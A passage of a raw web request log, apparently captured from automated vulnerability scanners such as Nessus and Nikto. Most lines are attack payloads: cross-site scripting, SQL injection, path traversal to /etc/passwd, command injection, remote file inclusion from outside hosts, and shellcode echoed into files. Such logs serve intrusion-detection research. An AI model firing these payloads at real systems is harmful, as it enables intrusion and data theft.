src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eventum/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\n/cgibin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/top.php?stuff=\"del\\xa0q42369787&rem\\xa0\n/help.php?q=\";sleep 10 #\n/7o5qp766.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/9ko6m4c8.aspx?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/5qnlm5z2.mscgi?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/scripts/index.php?id='union/**/select/**/0,0,1192005344,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/scripts/index.php?id='\n/82q7ywa8.cgi?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/ewc3rz1l.cfc?<script>document.cookie=\"testkgqo=204;\"</script>\n/javascript/.passwd.aspx\n/r3le3om5.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0auname\\x09#\n/en-us/7o5qp766.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-bin/viewcart.asp?userid='\n/jnt3f86c.jsp?<script>document.cookie=\"testcmax=9270;\"</script>\n/examples/jsp/error/index.php?id='union/**/select/**/0,0,410653569,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/o35zot2r.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?cid='\n/detail.asp?nchannel='1\n/top.php?stuff=\"|ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/examples/servlets/servlet/core/editor.php?editor_insert_bottom=/etc/passwd\n/recordings/shopper.cgi?newpage=../../../../../../etc/passwd\n/vbscript/\n/examples/jsp/sessions/index.php?site=../../../../../../../../etc/passwd\\x00\n/en-us/odzk29aa.idc?<script>document.cookie=\"testtfvh=2141;\"</script>\n/top.php?stuff=';del q38627655 #\n/vanguard decisionscript author v4/\n/javascript/feature.exe\n/ny1b3qq4.jsp?<script>cross_site_scripting.nasl</script>\n/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010411,1,1,1,1,1,1,1--&blogid=1\n/javascript/la.exe\n/en-us/dda2qr7j.jspa?<script>cross_site_scripting.nasl</script>\n/9kr0ih0v.aspx?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/smscript/\n/scripts/index.php?search=<script>foo</script>\n/d7ktpmcq.cgi?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/search=<script>alert('xss')</script>\n/javascript/document.cc\n/examples/jsp/checkbox/store.php?crn=42'&action=show&show_products_mode=cat_click\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/ghl9il?\\x00\n/main.php?stuff=\"&ping;-w;7000;-n;1;1.2.3.4&rem;\n/examples/jsp/checkbox/embed/day.php?path=/etc/passwd\\x00\n/en-us/account/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/cgi-915/fileseek.cgi?foot=;cat /etc/passwd&head=\n/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/en-us/esmozg5d.nsf?<script>cross_site_scripting.nasl</script>\n/m5103snj.kspx?<script>cross_site_scripting.nasl</script>\n/recordings/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}echo(md5('xoops_2_3_2brce'));function+v\n/0rufe52p.cfm?<script>cross_site_scripting.nasl</script>\n/rv98iwjp.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/campaignprescriptionforchange/\n/help.php?q=\"|ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/main.php?logout='\\x0duname >q42494852 #\n/j4oqyvga.jspa?<script>cross_site_scripting.nasl</script>\n/ows-bin/ion-p?page=../../../../../etc/passwd\n/zmvq66jy.cfc?<script>cross_site_scripting.nasl</script>\n/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/help.php?q=\"&rm q86798622&rem \n/javascript/checking.exe\n/top.php?stuff='\\x0arm\\x09q23871271\\x09#\n/cgi-bin/htimage.exe\n/en-us/account/core/editor.php?editor_insert_bottom=/etc/passwd\n/shellscripts/\n/examples/jsp/cal/styles.php?toroot=/etc/passwd\\x00\n/javascript/logs.exe\n/g3w7y7u5.php3?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904216',null,null,null,null --\n/3hlysl2x.cgi?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/main.php?stuff=;sleep\\x098\\x09#\n/main.php?stuff='\\x0drm\\x09q87288375\\x09#\n/bzuf9ozq.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fmnveedu.dll?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/main.php?logout=\"|ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/top.php?stuff=\"&rm\\x09q22847462\\x09#\n/cacti/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/top.php?stuff=;rm\\x09q22474851\\x09#\n/scripts/rih28haesl0j.php3\n/nmw0do67.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/postnuke.exe\n/7dbjwpw6.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/2aibfaczmac8?\n/odzk29aa.jsp?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1332010400\")</script>\n/s7qus4g3.nsf?<script>cross_site_scripting.nasl</script>\n/o1zj4u9v.cfm?<script>document.cookie=\"testabrn=6368;\"</script>\n/tuwjta1w.pl?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/82q7ywa8.kspx?<script>document.cookie=\"testpwew=1315;\"</script>\n/javascript/wwwroot.exe\n/if69ddo1.do?<script>document.cookie=\"testiabz=5220;\"</script>\n/phpmyadmin/texis.exe/nessus\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/cacti/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/en-us/7o5qp766.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?src=1&_common=1&time=1332010405&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/en-us/ddoworrl.kspx?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/jsp2/jspx/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/_xuzlr7swn95.shtml\n/user.php?caselist[bad_file.txt][path]=http://cirt.net/rfiinc.txt?&command=cat /etc/passwd\n/hipkz026.dll?<script>document.cookie=\"testyrbs=2855;\"</script>\n/en-us/account/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/bin/gwweb.exe?help=bad-request\n/cacti/wikka.php?wakka=homepage/../../actions/wikkachanges\n/examples/servlets/servlet/webdist.cgi?distloc=;id\n/javascript/my.exe\n/top.php?stuff='rm q24953383 #\n/admin/common/script.js.php.1\n/main.php?stuff=ver\\x09>q16924512&rem\\x09\n/toast.asp?action=posts&sub=search&fid-1&author=r0t&subject=\"><script>alert(\"410186083345\");</script><\n/help.php?q=\";uname >q43236884 #\n/technetplussubscriptions/\n/0w155a7c.fts?<script>cross_site_scripting.nasl</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/gcduwrjgmt.sh+>+/dev/null+&').\"]=1\n/qhvu0pdg.php3?<script>document.cookie=\"testchuc=2100;\"</script>\n/main.php?logout=\"&del\\x0bq41987339&rem\\x0b\n/javascript/fckeditor.exe\n/qczkquis.asp?<script>document.cookie=\"testkwlg=5591;\"</script>\n/top.php?stuff=\"&del,q96325278&rem,\n/javascript/sdk.exe\n/cgi-bin/urlcount.cgi?<img src=\"\" onerror=\"alert('vulnerable')\">\n/manager/calendar_admin.pl?config=|cat /etc/passwd|\n/bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/scripts/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/cacti/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/examples/jsp/cal/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/x7pclv4s.php?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/main.php?stuff='\\x0duname #\n/ybz5rz7a.x?<script>document.cookie=\"testsbvw=6289;\"</script>\n/main.php?stuff=\"ver;>q96628225&rem;\n/shen'dralar/\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1332010418.php.\n/d5a5renl.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.asp?<script>document.cookie=\"testblcp=8120;\"</script>\n/top.php?stuff=\"rm\\x09q67284925&rem\\x09\n/examples/jsp/jsp2/jspx/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/phpmyadmin/feedsplitter.php?format=../../../../../../../../../../etc/passwd\\x00&debug=1\n/bl8sefdm.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=;uname\\x09>q22474851\\x09#\n/examples/jsp/error/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd\n/quagynka.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1r8cfrlf.php3?<script>document.cookie=\"testydan=5106;\"</script>\n/help.php?q='\\x0auname\\x09>q47355772\\x09#\n/top.php?stuff='&sleep\\x099\\x09#\n/x7pclv4s.cfc?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/b4vng02k.cgi?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/dda2qr7j.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/rss.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?\n/cacti/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332008637')</script>\n/nuh3zirz.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/_head.php?_zb_path=../../../../../../../../../../etc/passwd\\x00\n/main.php?frm_daynight=q23739866&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=\n/scripts/sitemap.scr.php?globals[pth][classes]=http://192.168.202.118:8080/zz5thkvtmlgl??\n/examples/jsp/num/index.php?chemin=../../../../../../..//etc\n/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=go&linecnt=500&refresh=0\n/<script>document.cookie=\"testcmax=9270;\"</script>\n/en-us/i686v90l.cgi?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/9kr0ih0v.cgi?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/en-us/7o5qp766.asp?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\\x0duname >q49774432 #\n/5qnlm5z2.cgi?<script>document.cookie=\"testsixi=8451;\"</script>\n/o35zot2r.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fnwhrxyd.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/odzk29aa.x?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/ny1b3qq4.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/magazine_subscriptions/\n/b1q8bywu.cfm?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/help.php?q=\"\\x0arm q34395972 #\n/xsqln7eb.kspx?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/main.php?logout=\"|ping -w 8000 -n 1 4.3.2.1|rem \n/script_webnewsplus/\n/help.php?q=;del q88998669 #\n/subscriptioncenter/\n/children's_software/\n/en-us/esmozg5d.html?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='\\x0dsleep\\x0910\\x09#\n/bin/.htpasswd\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439\n/cgi-local/texis.exe/junk\n/en-us/account/texis.exe/?-dump\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/nxdfmqaalo.sh+>+/dev/null+&'); function v\n/en-us/account/showcat.php?cat=1'\n/subscriptions.tgz\n/javascript/_files.exe\n/examples/jsp/jsp2/jspx/misc/audio.php?recording=../version.inc\n/scripts/query?mss=../config\n/en-us/manager/launcher/apps/local?msgid=3239100.942619045103&amp;ns=launcher&amp;redirecting=true\n/script/ident/identification.php?path_inc=http://cirt.net/rfiinc.txt?\n/pspasswd/\n/bmeun223.cfc?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/qhvu0pdg.do?<script>document.cookie=\"testchuc=2100;\"</script>\n/rv98iwjp.mscgi?<script>cross_site_scripting.nasl</script>\n/cgi-home/.passwd\n/azcrfs8d.cgi?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/jw64yq8u.cgi?<script>document.cookie=\"testylfu=1313;\"</script>\n/rbec2ohx.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xfkun1ku.cgi?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0drm\\x09q97796724\\x09#\n/cgibin/c32web.exe/changeadminpassword\n/scriptpath/index.php?page=@rfiurl\n/examples/jsp/jsp2/jspx/cwmail.exe\n/lsoix5h3.cfm?<script>cross_site_scripting.nasl</script>\n/ows-bin/fileseek.cgi?foot=;cat /etc/passwd&head=\n/javascript/hire.exe\n/examples/servlets/servlet/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/main.php?stuff=\"\\x0ddel q25775847 #\n/en-us/account/viewcvs.cgi/?cvsroot=<script>foo</script>\n/perlscript/\n/top.php?stuff=\"&ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/en-us/7o5qp766.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/w4996nr0.do?<script>document.cookie=\"testttvs=7163;\"</script>\n/over 400 clan and gaming league themes and scripts/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/hwxugbkmva;\"\n/en-us/account/fxm.exe\n/ywaxntrx.php3?<script>cross_site_scripting.nasl</script>\n/javascript/contacts.exe\n/main.php?stuff=\"rm,q33358897&rem,\n/examples/jsp/checkbox/shoutbox.php?conf=../\n/6dlc2zm9.php3?<script>document.cookie=\"testqpux=4016;\"</script>\n/javascript/have.exe\n/help.php?q=\"&rm\\x0cq93118475&rem\\x0c\n/scripts/1331908679-ror_session_fixation.nasl\n/recordings/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/investor doesn't see browser in google's future/\n/examples/jsp/jsp2/jspx/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/main.php?stuff='&del\\x09q47285252\\x09#\n/include.php?path=contact.php&contact_email=\\\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;\n/javascript/customers.exe\n/m4kkjf8l.x?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/odzk29aa.php3?<script>document.cookie=\"testtfvh=2141;\"</script>\n/igtf0zon.x?<script>cross_site_scripting.nasl</script>\n/7uz3ok60.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/cacti/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/top.php?stuff=;del\\x09q71367433\\x09#\n/webcgi/cgi-test.exe\n/scripts/base_qry_common.php?base_path=/etc/passwd\\x00\n/gepi/gestion/savebackup.php?cmd=cat/etc/passwd&filename=@rfiurl\n/scripts/tomcat_proxy_directory_traversal.nasl1331919009\n/pxagj7n7.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>\n/managerfaq.php?skin=../../admin/manager&tplpath=admin\n<script>document.cookie=\"testtkio=5454;\"</script>\n/showcat.php?cat=1'\n<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/hjdzm96v.jspa?<script>document.cookie=\"testbyqe=7474;\"</script>\n/igtf0zon.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/search.jsp?q=%\"<script>alert(1331904374)</script>\n/rv98iwjp.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php&frm_user=q44275597&scr_height=&scr_width=\n/o'connor/\n/examples/jsp/sessions/forumdisplay.php?fid=21\"><script>x</script>\n/main.php?logout=\";uname >q56278633 #\n/examples/jsp/checkbox/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+01+42+00+ff+d0+8b+e3+ff+d7+6a+06+6a+01+6a+02+ff+d0+8b+e8+ff+d7+6a+00+6a+00++>>esbq\n/index.php?in=song&term=<script>alert(\"411805577582\");</script>&action=search&start=0\n/j4drbkil.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nmw0do67.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"\\x0arm q55324883 #\n/examples/jsp/checkbox/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/examples/jsp/jsp2/el/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/169okeyj.aspx?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/cgi-bin/search.jsp?q=%\"<script>alert(1332010391)</script>\n/vjbrrppi.kspx?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/showproduct.php?product=1'\n/hawai'i/\n/phpmyadmin/phpmyadmin.css.php?collation_connection=utf8_general_ci&convcharset=utf-8&js_frame=right&lang=en-utf-8&nocache=3830415403&token=1'\n/examples/jsp/cal/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/examples/jsp/jsp2/jspx/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/ovcgi/openview5.exe?target=main&action=../../../../../../../../../..//winnt/win.ini\n/<script>document.cookie=\"testgfjr=1286;\"</script>\n/examples/jsp/cal/docs.php?doc=../jpgraph-1.12.1/docs/index\n/3m5knyc4.php3?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/scriptwiz/\n/scripts/cdjnwtwnqga1.inc\n/examples/jsp/cal/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/opensiteadmin/scripts/classes/form.php?path=http://cirt.net/rfiinc.txt?\\x00\n/3hlysl2x.do?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/3j8echh0.x?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/msadc/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/faq.php?action=&type=view&s=&id=-1' union select 0,44220770,0,0,0,0,0--\n<meta http-equiv=set-cookie content=\"testulex=4996\">\n/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/moclyxlwqyfjnp?\\x00\n/7o5qp766.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/album.asp\n/examples/jsp/jsp2/el/core/editor.php?editor_insert_bottom=/etc/passwd\n/myphpnuke/links.php?op=mostpopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent\n/javascript/authorized_keys.exe\n/fo564rei.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o6ebbirj.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm\\x09q37118447&rem\\x09\n/0qhcnefz.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/man-cgi?section=0&topic=ls;id\n/javascript/group.exe\n/gy23xnjq.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 996551295,2,294567145,4,5,6,7,8,9,0,1,2,3 --\n/manager/whois.cgi?action=load&whois=;id\n/0z575z74.fts?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/main.php?logout=\"|ping;-w;10000;-n;1;1.2.3.4|rem;\n/recordings/mail.php?id='/**/union/**/select/**/1,2,1331919012,4--&blog=1\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/whmch8ftkt7kv??\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.php\n/interface/login/login_frame.php?site=<script>alert('owasp zap');</script>\n/top.php?stuff=\"ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/en-us/oie504mr.kspx?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/examples/jsp/checkbox/ovlaunch.exe\n/o6ebbirj.exe?<script>cross_site_scripting.nasl</script>\n/d7ktpmcq.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+08+00+60+89+e5+52+56+57+6a+02+6a+6c+68+6c+2e+64+6c+68+6e+74+64+6c+54+ff+54++>>esbq\n/recordings/add_url.htm?node=<script>alert('xss')</script>\n/applescripttmm/\n/j734qobz.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sitefinity/login.aspx\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331919170\n/scripts/1331904160-ror_session_fixation.nasl\n/scripts/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/recordings/forum_2.php?msg=10&return=<script>foo</script>\n/main.php?stuff=;del\\x09q16377967\\x09#\n/javascript/policy.exe\n/bin/common/user_update_passwd.pl\n/help.php?q=\"&ping -w 8000 -n 1 4.3.2.1&rem \n/transcription-r0/\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='158054968\n/help.php?q='\\x0duname\\x09>q57419215\\x09#\n/main.php?stuff=\"rm;q74579968&rem;\n/cgi-bin/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/dslpwt15.html?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/scriptpath/index.php?page=http://192.168.202.118:8080/iroy1gvqrrqu?\n/javascript/large.exe\n/main.php?logout=\"uname #\n/phpmyadminfaq.php?skin=../../admin/manager&tplpath=admin\n/606wkcop.x?<script>cross_site_scripting.nasl</script>\n/rv98iwjp.aspx?<script>cross_site_scripting.nasl</script>\n/j4oqyvga.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/scripts/lpzj75ztw9lb.php3\n/javascript/addpost.exe\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1332008334,1157745168 --\n/en-us/oie504mr.pl?<script>document.cookie=\"testtpby=7052;\"</script>\n/scripts/shop.plx/page=nessus552417727\n/help.php?q=\"\\x0ddel q66781813 #\n<script>document.cookie=\"testlihk=7070;\"</script>\n/9ko6m4c8.jsp?<script>document.cookie=\"testylik=3403;\"</script>\n/examples/jsp/num/file.php?path=/etc/passwd\\x00\n/manager/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/phpmyadmin/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/606wkcop.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/6dlc2zm9.do?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/javascript/imgs.exe\n/examples/jsp/num/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/y8pmygrp.dll?<script>cross_site_scripting.nasl</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.fts\n/top.php?stuff=\"&ver\\xa0>q12371867&rem\\xa0\n/scripts/.htpasswd\n/qhvu0pdg.cfc?<script>document.cookie=\"testchuc=2100;\"</script>\n/main.php?stuff=\"rm\\x0bq67582951&rem\\x0b\n/scgi-bin/gw5/gwweb.exe?help=bad-request\n/index.php?id='union/**/select/**/0,0,1926346269,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgi-bin/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/cacti/print.php?what=article&id='\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=8ibv0ysnyk0rxa9s5\n/ewc3rz1l.asp?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/x7pclv4s.cgi?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/examples/jsp/sessions/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/javascript/inetpub.exe\n/top.php?stuff=\";uname\\x09>q95359991\\x09#\n/uc3w3bdi.cfc?<script>document.cookie=\"testxllt=9940;\"</script>\n/phpmyadmin/admin/top.php?admindir=/etc/passwd\\x00\n/cgi-914/fileseek.cgi?foot=;cat /etc/passwd&head=\n/edzaia0i.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/index.php?post=../config/password\n/scripts/check-lom.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz?\n/examples/jsp/sessions/myevent.php?myevent_path=/etc/passwd\\x00\n/nyjgaorz.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/quagynka.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/8x6w469u.php?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/jsp/jsp2/el/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/x2gyorli.x?<script>document.cookie=\"testwhac=3130;\"</script>\n/s7qus4g3.fts?<script>cross_site_scripting.nasl</script>\n/cgi-bin/scripts/slxweb.dll/getfile?type=library&file=[invalid filenikto]\n/who's-connecting/\n/6wb70v0b.php?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/jujgxwav.asp?<script>document.cookie=\"testknim=9383;\"</script>\n/scripts/library/lib.php?root=http://xxxxxxxxxxx\n/examples/jsp/sessions/php.cgi?/etc/passwd\n/cgi-bin/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/weq93ppb.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1187747366,616507462,1,1,1,1,1--&blogid=1\n/javascript/go.exe\n/javascript/war.exe\n/scripts/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/zroo33l4.php3?<script>document.cookie=\"testiklc=904;\"</script>\n/scripts/index.php?edit=nonexistant460875066\n/b4vng02k.pl?<script>document.cookie=\"testtrlh=3672;\"</script>\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331918987\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --\n/h5i6crm3.dll?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/datingscript_features/\n/qhvu0pdg.mscgi?<script>document.cookie=\"testchuc=2100;\"</script>\n/ows-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/no4ghqiguzhst?\n/fpnpp5zg.html?<script>document.cookie=\"testyias=101;\"</script>\n/scripts/apgafvcxoeeh.cgi\n/javascript/phpeventcalendar.exe\n/javascript/documents.exe\n/i2n4v4rl.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0arm q15138829 #\n/top.php?stuff=\"|sleep 7 #\n/recordings/showproduct.php?product=1'\n/help.php?q=|ping;-w;8000;-n;1;4.3.2.1|rem;\n/33y9gcqq.kspx?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/g3w7y7u5.fts?<script>document.cookie=\"testbfpq=3326;\"</script>\n/ny1b3qq4.php?<img 